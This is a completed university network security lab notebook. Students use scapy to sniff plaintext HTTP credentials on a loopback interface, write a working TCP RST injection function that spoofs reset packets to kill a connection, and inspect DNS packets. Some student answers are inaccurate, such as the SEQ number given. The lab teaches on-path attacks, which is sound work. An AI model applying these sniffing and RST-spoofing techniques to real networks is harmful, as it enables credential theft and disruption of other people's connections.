# CS 161: Network Security Lab
v1.0 Shomil Jain.

Hey! Welcome to the world of network security. In this lab, you'll have a chance to apply some of the concepts you've learned over the past few week. This lab has two parts.
1. **Part 1:** Coffee Shop Attacks [TCP/IP, TLS]
2. **Part 2:** Other Networking Topics [DNS, DNSSec]

***

**<h3>This lab also requires you to be a root user on your local computer.</h3>**
If you didn't launch this notebook as root , quit & re-launch the notebook using the following command: `sudo jupyter notebook --allow-root`

---

# Environment Setup

This lab requires the Python `flask`, `scapy`, and `requests` modules. `scapy` should work out-of-the-box for MacOS; if you're using a Linux or Windows device, you may need to follow additional platform-specific versions available [here](https://scapy.readthedocs.io/en/latest/installation.html#platform-specific-instructions), such as installing `tcpdump`, if applicable. If you're unable to get `scapy` working, please check the [FAQ's](https://docs.google.com/document/d/1FWNH1TqVD9aXqfcGrbE6o0xaJEuPrjQMhgPJMuQ5oLM/edit) or make a Piazza post!
<br>
<br>
**Run the following code block to install the required modules:**

In [1]:
!pip install flask scapy requests

#### Network Interface
This lab simulates connections between a client & server running on your local interface. The default values for these are in the comments below, but your specific `loopback` / `LAN` interface might be different. Try the values specified below, but if they don't work, refer to the [FAQ's](https://docs.google.com/document/d/1FWNH1TqVD9aXqfcGrbE6o0xaJEuPrjQMhgPJMuQ5oLM/edit?usp=sharing) or make a Piazza Post.

In [4]:
# TODO: Set the value below based on your platform.

# MacOS: 'lo0'
# Linux: 'lo'
# Windows: 'Run ipconfig / all in a terminal window & copy your Wireless LAN Interface description value here.'

NETWORK_INTERFACE = 'lo'

To test if scapy is set up correctly, run the following cells. If you see an error, your network interface might be incorrect, or you might need to re-run this notebook as a root user (`sudo jupyter notebook`).

In [5]:
from scapy.all import *

/usr/lib/python3.10/site-packages/scapy/layers/ipsec.py:471: CryptographyDeprecationWarning: Blowfish has been deprecated
  cipher=algorithms.Blowfish,
/usr/lib/python3.10/site-packages/scapy/layers/ipsec.py:485: CryptographyDeprecationWarning: CAST5 has been deprecated
  cipher=algorithms.CAST5,


In [4]:
sniff(iface=NETWORK_INTERFACE, count=1)

<Sniffed: TCP:1 UDP:0 ICMP:0 Other:0>

**If you see `<Sniffed: ...>` above, you're ready to proceed!**

If you see an error, either try doing a quick Google Search to diagnose your problem, or make a Piazza post with details about your system (i.e. Mac/Windows/Linux).

***

# Part 1: Coffee Shop Attacks

## Preface

Imagine you're sitting at a coffee shop. You connect to the coffee shop's public, shared WiFi network. You notice that EvanBot is also at the coffee shop – and connected to the same network. We'd like to explore the following questions:
- How much of EvanBot's browsing activity can we monitor by simply being on the same WiFi network? 
- Can we interrupt his activity in any way?
- What can EvanBot do to protect himself?

## Quick Review: Packets

A **Network Packet** is an atomic unit of structured communication. Packets contain a **Header** and a **Payload**.


The protocols for sending information over the internet follow a layered structure. Our interpretation of these layers closely follows the [OSI 7-Layer Model](https://en.wikipedia.org/wiki/OSI_model). The three layers that we're going to explore in this lab are the Application Layer, the Transport Layer, and the Network Layer.
- **Application Layer**: the human-readable context you want to send (i.e. HTML, JSON, etc.)
- **Transport Layer**: this creates an end-to-end connection between the source & destination servers (i.e. UDP, TCP)
- **Network Layer**: this finds routes through the internet to actually send messages (i.e. IP)

<img style="float: left;" src="images/layers.png" width="250">

## Quick Review: HTTP


**HTTP (Hypertext Transfer Protocol)** is an Application Layer protocol that websites and apps use to communicate with servers and databases. Just like the other layers, HTTP Packets are encapsulated in the layer below – the Transport layer. They also have headers and (optionally) payloads – check out the examples below.

#### GET Requests are used to request data from a server.
```
GET / HTTP/1.1
Host: squigler.com
Dnt: 1
```

#### POST Requests are used to upload data to a server.
```
POST /login HTTP/1.1
Host: squigler.com
Content-Length: 40
Content-Type: application/x-url-formencoded
Dnt: 1

{"username": "Alice", "password": "1234"}
```

In the first example, the GET Request contains an empty payload; all the information needed to process the request is in the header. In the second example, the POST Request contains a JSON (dictionary) payload. 

# Attack #1: Sniff Insecure Network Traffic

EvanBot decides to log in to his CalCentral Account at http://calcentral.berkeley.edu. Can we see his username and password? **Note: he's using HTTP, not HTTPS. Why does that matter?**
<br/>
<br/>
When EvanBot submits his login information via CalCentral, his browser makes a POST Request to http://calcentral.berkeley.edu/api/login with his username and password attached in the data payload. Take a look at the client-side logic (runs on EvanBot's browser) and the server-side logic (runs on the CalCentral server) below.
***
### Client-Side Logic
```Python
def handle_login_button_clicked():
    # Make a POST Request to CalCentral, containing the entered username/password.
    success = requests.post('http://calcentral.berkeley.edu/api/login', 
                            data=json.dumps({
                                'username': page.get('username'),
                                'password': page.get('password')
                            })).json()
    
    # Check the value of the response.
    if success.get('success') == True:
        print("Login completed successfully!")
    else:
        print("Username or password was incorrect.")
```
***
### Server-Side Logic
```Python
# Handle the POST Request on the server.
@app.route('/api/login', methods=['POST'])
def login_user():
    username = request.form.get('username', '')
    password = request.form.get('password', '')
    
    # Check if evanbot's username and password are valid.
    if username == 'HIDDEN' and password == 'HIDDEN':
        success = True
    else:
        success = False
        
    return success
```
***

### Simulate a Login Event & Capture Packets

In this attack, our goal is to simulate an on-path attacker. We're going to wait for EvanBot to log in - and then try to steal his login credentials, which are sent as plaintext over the insecure TCP connection.

**Instructions:**
Open up two terminal windows. We'll refer to them as **T1** and **T2**. In both windows, change directory to the attack1 folder (`cd attack1`).

_(If you're using a virtual environment, make sure both windows also run in the same environment)_

1. **In Notebook**: Start sniffing for packets by running the cell below.
2. **In T1**: start the web server by running `python app.py --port 1616`
3. **In T2**: Simulate a login event by running `python login.py --port 1616` (in a separate terminal window)
4. After packets show up in this cell's output, stop the cell and proceed!

In [5]:
# After following the instructions above, you should see several 
# packets show up underneath this cell

packets = []

def print_packet(packet):
    global packets
    packets.append(packet)
    print(f'Collected {len(packets)} packets.')

print("Starting network sniffing. Now, simulate a login event.")
sniff(filter="port 1616", prn=print_packet, iface=NETWORK_INTERFACE)

Starting network sniffing. Now, simulate a login event.
Collected 1 packets.
Collected 2 packets.
Collected 3 packets.
Collected 4 packets.
Collected 5 packets.
Collected 6 packets.
Collected 7 packets.
Collected 8 packets.
Collected 9 packets.
Collected 10 packets.
Collected 11 packets.
Collected 12 packets.
Collected 13 packets.
Collected 14 packets.
Collected 15 packets.
Collected 16 packets.
Collected 17 packets.
Collected 18 packets.
Collected 19 packets.
Collected 20 packets.
Collected 21 packets.
Collected 22 packets.
Collected 23 packets.
Collected 24 packets.
Collected 25 packets.
Collected 26 packets.
Collected 27 packets.
Collected 28 packets.


<Sniffed: TCP:28 UDP:0 ICMP:0 Other:0>

***
## 1.1
* **How many TCP packets did you collect in one simulated login event? UDP packets?**
* **How many packets contained payloads? (A packet that contains a Payload has a "Raw" layer.**
* **How many bytes did the server send to the client?**
* **How many bytes did the client send to the server?**

Note: you can access the packets sniffed above using the `packets` array. Use `packet.summary()` to see a summary of the packet.

_Hint: The python `len` function returns the total size (# bytes) of a packet._
<br>
_Hint: to differentiate server & client, look at the HTTP Payloads, or consider which of the two initiated the connection._
***

In [6]:
# TODO: YOUR CODE HERE [to answer Checkpoint Question 1.1]
def answer_1():
    tcp_num, udp_num = 0, 0
    payloads_num = 0
    server_bytes, client_bytes = 0, 0
    isClient = True
    for packet in packets:
        if packet.summary().find("TCP") != -1:
            tcp_num += 1
        if packet.summary().find("UDP") != -1:
            udp_num += 1
        if packet.summary().find("Raw") != -1:
            payloads_num += 1
        if isClient:
            client_bytes += len(packet)
        else:
            server_bytes += len(packet)
        isClient = not isClient

    return tcp_num, udp_num, payloads_num, server_bytes, client_bytes

print(answer_1())

(28, 0, 8, 1366, 1366)


**<span style = "color: red">(YOUR ANSWERS HERE)</span>**

+ 28, 0
+ 8
+ 1366 bytes
+ 1366 bytes

## 1.2
Take a closer look at the first packet (hint: use `packet.show()` to show the structure of the packet).
* **What is the TTL of this packet?**
* **What are the source & destination addresses of the IP layer?**
* **What is the SEQ and ACK numbers of the TCP layer?**
***

In [7]:
# TODO: YOUR CODE HERE [to answer Checkpoint Question 1.2]
def answer_2():
    packets[0].show()
answer_2()

###[ Ethernet ]### 
  dst       = 00:00:00:00:00:00
  src       = 00:00:00:00:00:00
  type      = IPv4
###[ IP ]### 
     version   = 4
     ihl       = 5
     tos       = 0x0
     len       = 60
     id        = 12622
     flags     = DF
     frag      = 0
     ttl       = 64
     proto     = tcp
     chksum    = 0xb6c
     src       = 127.0.0.1
     dst       = 127.0.0.1
     \options   \
###[ TCP ]### 
        sport     = 41938
        dport     = netbill_prod
        seq       = 1092104713
        ack       = 0
        dataofs   = 10
        reserved  = 0
        flags     = S
        window    = 65495
        chksum    = 0xfe30
        urgptr    = 0
        options   = [('MSS', 65495), ('SAckOK', b''), ('Timestamp', (1373407581, 0)), ('NOP', None), ('WScale', 7)]



**<span style = "color: red">(YOUR ANSWERS HERE)</span>**

+ 64
+ 127.0.0.1, 127.0.0.1
+ 652853333, 0

### Extract the Payload and Response from this TCP Connection
Up to this point, we've analyzed the Network (IP) and Transport (TCP) layers. In order to extract EvanBot's login credentials, we need to analyze the Application (HTTP) layer.

This layer is contained within the payload of a handful of packets within the TCP sequence. After the TCP connection is established, the HTTP Layer can send and receive data through the payload of the TCP connection. In our packet structure, this shows up as the "Raw" payloads.

***
## 1.3
Find the packet that contains EvanBot's username and password. 

*Hint: use packet.show() to show the structure of the packet. Look at the RAW (payload) section of the packet, if it exists. Not all packets contain payloads. To print the payload, use `packet[TCP].payload`.*

* **What user agent did the HTTP request originate from?**
* **What are EvanBot's username and password?**
* **Were the username/password combination correct?**
* **This attack wouldn't work if Evanbot was using HTTPS. Why?**
* **This attack wouldn't work if we weren't on-path. Why?**
***

In [8]:
# TODO: YOUR CODE HERE [to answer Checkpoint Question 1.3]
def answer_3():
    info = ""
    for packet in packets:
        if packet.summary().find("Raw") != -1:
            info += repr(packet.payload)
    
    return info
print(answer_3())

<IP  version=4 ihl=5 tos=0x0 len=231 id=12624 flags=DF frag=0 ttl=64 proto=tcp chksum=0xabf src=127.0.0.1 dst=127.0.0.1 |<TCP  sport=41938 dport=netbill_prod seq=1092104714 ack=4060254957 dataofs=8 reserved=0 flags=PA window=512 chksum=0xfedb urgptr=0 options=[('NOP', None), ('NOP', None), ('Timestamp', (1373407582, 1373407581))] |<Raw  load='POST /api/login HTTP/1.1\r\nHost: 127.0.0.1:1616\r\nUser-Agent: python-requests/2.27.1\r\nAccept-Encoding: gzip, deflate, br\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Length: 48\r\n\r\n' |>>><IP  version=4 ihl=5 tos=0x0 len=231 id=12624 flags=DF frag=0 ttl=64 proto=tcp chksum=0xabf src=127.0.0.1 dst=127.0.0.1 |<TCP  sport=41938 dport=netbill_prod seq=1092104714 ack=4060254957 dataofs=8 reserved=0 flags=PA window=512 chksum=0xfedb urgptr=0 options=[('NOP', None), ('NOP', None), ('Timestamp', (1373407582, 1373407581))] |<Raw  load='POST /api/login HTTP/1.1\r\nHost: 127.0.0.1:1616\r\nUser-Agent: python-requests/2.27.1\r\nAccept-Encoding: gz

**<span style = "color: red">(YOUR ANSWERS HERE)</span>**

+ User-Agent: python-requests/2.27.1.
+ {"username": "evanbot", "password": "bot>human"}.
+ Due to {"success":"Incorrect password!"}, the combination were not correct.
+ Because HTTPS would encrypt the message, we don't have the key.
+ Because we need to capture the packet, so we must be on-path.


# Attack #2: Perform a RST Injection Attack

Congratulations, you're now officially an on-path attacker! You were able to observe a login event occurring over HTTP without alerting either party of your malicious actions.

In this section, we're going to take your hacking skills one step further. It's time to simulate a **RST Injection Attack**! 

### Background
Assume Alice and Bob are communicating over a TCP connection. For every data packet that Alice sends to Bob, Bob replies with a packet with the **ACK** flag set. This indicates a successful acknowledgement of recieving the packet. If Alice doesn't recieve the **ACK**, she can re-send the packet over and over again (to a certain limit) until Bob recieves it and acknowledges it with an **ACK**.  

To terminate a TCP connection, either party can send a TCP packet with the **RST ('R')** flag set. If the sequence number of the **RST** is valid, then the connection will be terminated immediately.

Examples of groups that have used this technique include:
- China (the Great Firewall)
- Comcast (to block BitTorrent uploads)
- Some intrusion detection systems, to mitigate attacks in progress

***
## 1.4
* **What information do we need to know or guess in order to perform a RST Injection Attack?**
***

**<span style = "color: red">(YOUR ANSWERS HERE)</span>**

+ We need to know or guess one of the sequence number

### Simulate an Active TCP Connection + Inject a RST Packet

In this section, we're going to walk through performing a RST Injection Attack by observing communication on a webserver and injecting RST packets to terminate the connection.

**Instructions:**
1. Change directory to the attack2 folder (`cd attack2`)
2. In T1, start the web server by running `python server.py --port 2020`
3. In T2, start the client simulation by running `python client.py --port 2020` (in a separate terminal window)
4. Proceed below.

_(If you're using a virtual environment, make sure both windows also run in the same environment)_


#### Construct the Attack

In this attack, we have an active TCP connection to the web server running on port 2020. Our goal, as an on-path attacker, is to construct a packet injection function that responds to any sniffed packets by injecting a packet with the RST Flag set.

Fill out the appropriate segments below to proceed.

In [11]:
# TODO: Fill out the appropriate fields below.
conf.L3socket = L3RawSocket

def inject_packet(packet):
    """
    This is a 'callback' - it's a function that's called as soon as we intercept a packet.
    Our goal is to execute a RST Injection Attack on this connection by injecting a malicious packet.
    
    Hint: you will need to use these values when constructing your spoofed packet.
    
    - packet[IP].src
    - packet[IP].dst
    - packet[TCP].sport
    - packet[TCP].dport
    - packet[TCP].seq
    - packet[TCP].ack
    
    """
    
    if packet[IP].dst == 2020:
        return
    
    # Construct the IP Layer and the TCP Layer.
    ip_layer = IP(src=packet[IP].dst, 
                  dst=packet[IP].src)

    tcp_layer = TCP(sport=packet[TCP].dport, 
                    dport=packet[TCP].sport, 
                    flags='R', 
                    window=512, 
                    seq=packet[TCP].ack)

    # Enclose the TCP Layer within an IP Layer.
    response_packet = ip_layer / tcp_layer
    
    # Send the packet.
    send(response_packet, verbose=0, iface=NETWORK_INTERFACE)


After you run the cell below, go to the terminal window that you were running the `server.py` file in. You should see a `BrokenPipeError` indicating the connection was terminated. If you don't see that, then you might have to tweak the values of your setup.

In [13]:
packets = sniff(filter="port 2020", prn=inject_packet, iface=NETWORK_INTERFACE, count=20)

***
## 1.5
* **What was the code printed when you terminated the connection? (This makes sure you actually successfully performed the RST Injection Attack).**
* **Would an off-path attacker be able to perform a RST Injection Attack?**
* **Would a RST Injection Attack work on HTTPS traffic?**
***

**<span style = "color: red">(YOUR ANSWERS HERE)</span>**

+ Errno 104 Connection reset by peer
+ Off-path attacker can do blind-spoofing
+ Yes, tls works up the HTTP

# Part 2: Other Networking Topics

This part requires the `dig` command-line tool in order to work properly. It comes built in on MacOS and Linux, but if you're on Windows, you may need to install it [here](https://help.dyn.com/how-to-use-binds-dig-tool/). If you're having issues, please make a Piazza post!

### Quick Review: DNS

The Internet is commonly indexed in two different ways. Humans refer to websites using human-readable names such as http://google.com and http://eecs.berkeley.edu, while computers refer to websites using IP addresses such as `172.217.4.174` and `23.195.69.108`. DNS, or the Domain Name System, is the protocol that translates between the two.

Your local computer usually delegates the task of DNS lookups to a **DNS Recursive Resolver**, which sends the queries, processes the responses, and maintains an internal cache of records. When performing a lookup, the **DNS Stub Resolver** on your computer sends a query to the recursive resolver, lets it do all the work, and receives the response. The recursive resolver is usually provided by your ISP and/or configured into your network connection by DHCP.

The **DNS Authority Servers** or name servers are servers on the Internet responsible for answering DNS queries. There is a special set of authority servers, the root servers, that are publicly known - you can see them for yourself here.

### Sniff DNS Lookup

To start, we're going to take a look at the structure of a DNS Lookup. Run the cell below, and run `dig eecs.berkeley.edu` immediately after in a terminal window. You should see two packets printed below: a DNS Query, and a DNS Answer. 

In [17]:
#! /usr/bin/env python3

from scapy.all import DNS, DNSQR, DNSRR, IP, send, sniff, sr1, UDP
def print_packet(p):
    print(p.summary())
    
packets=sniff(prn=print_packet, lfilter=lambda x: x.haslayer(DNS), count=2)

Ether / IP / UDP / DNS Qry "b'eecs.berkeley.edu.'" 
Ether / IP / UDP / DNS Ans "23.185.0.1" 


***
## 2.1
* **What is the structure of the DNS Query & Response?**
* **Does the DNS Query & Response use TCP or UDP? Why do you think so?**
* **What is the IP Address of your DNS Recursive Resolver?**
***

In [25]:
# YOUR CODE HERE for Checkpoint Question 2.1
from scapy.all import DNS, DNSQR, DNSRR, IP, send, sniff, sr1, UDP
def answer_4():
    packets = sniff(lfilter=lambda x: x.haslayer(DNS), count=5)
    packets[0].show()
    packets[1].show()
answer_4()

###[ Ethernet ]### 
  dst       = b0:76:1b:21:30:ab
  src       = 80:b6:55:e9:93:3c
  type      = IPv4
###[ IP ]### 
     version   = 4
     ihl       = 5
     tos       = 0x0
     len       = 86
     id        = 23142
     flags     = 
     frag      = 0
     ttl       = 64
     proto     = udp
     chksum    = 0x6ad1
     src       = 10.198.112.33
     dst       = 202.117.112.3
     \options   \
###[ UDP ]### 
        sport     = 46341
        dport     = domain
        len       = 66
        chksum    = 0xb5b3
###[ DNS ]### 
           id        = 52966
           qr        = 0
           opcode    = QUERY
           aa        = 0
           tc        = 0
           rd        = 1
           ra        = 0
           z         = 0
           ad        = 1
           cd        = 0
           rcode     = ok
           qdcount   = 1
           ancount   = 0
           nscount   = 0
           arcount   = 1
           \qd        \
            |###[ DNS Question Record ]### 
            | 

**<span style = "color: red">(YOUR ANSWERS HERE)</span>**

+ See the code ouput (way too long)
+ UDP
+ 202.117.112.3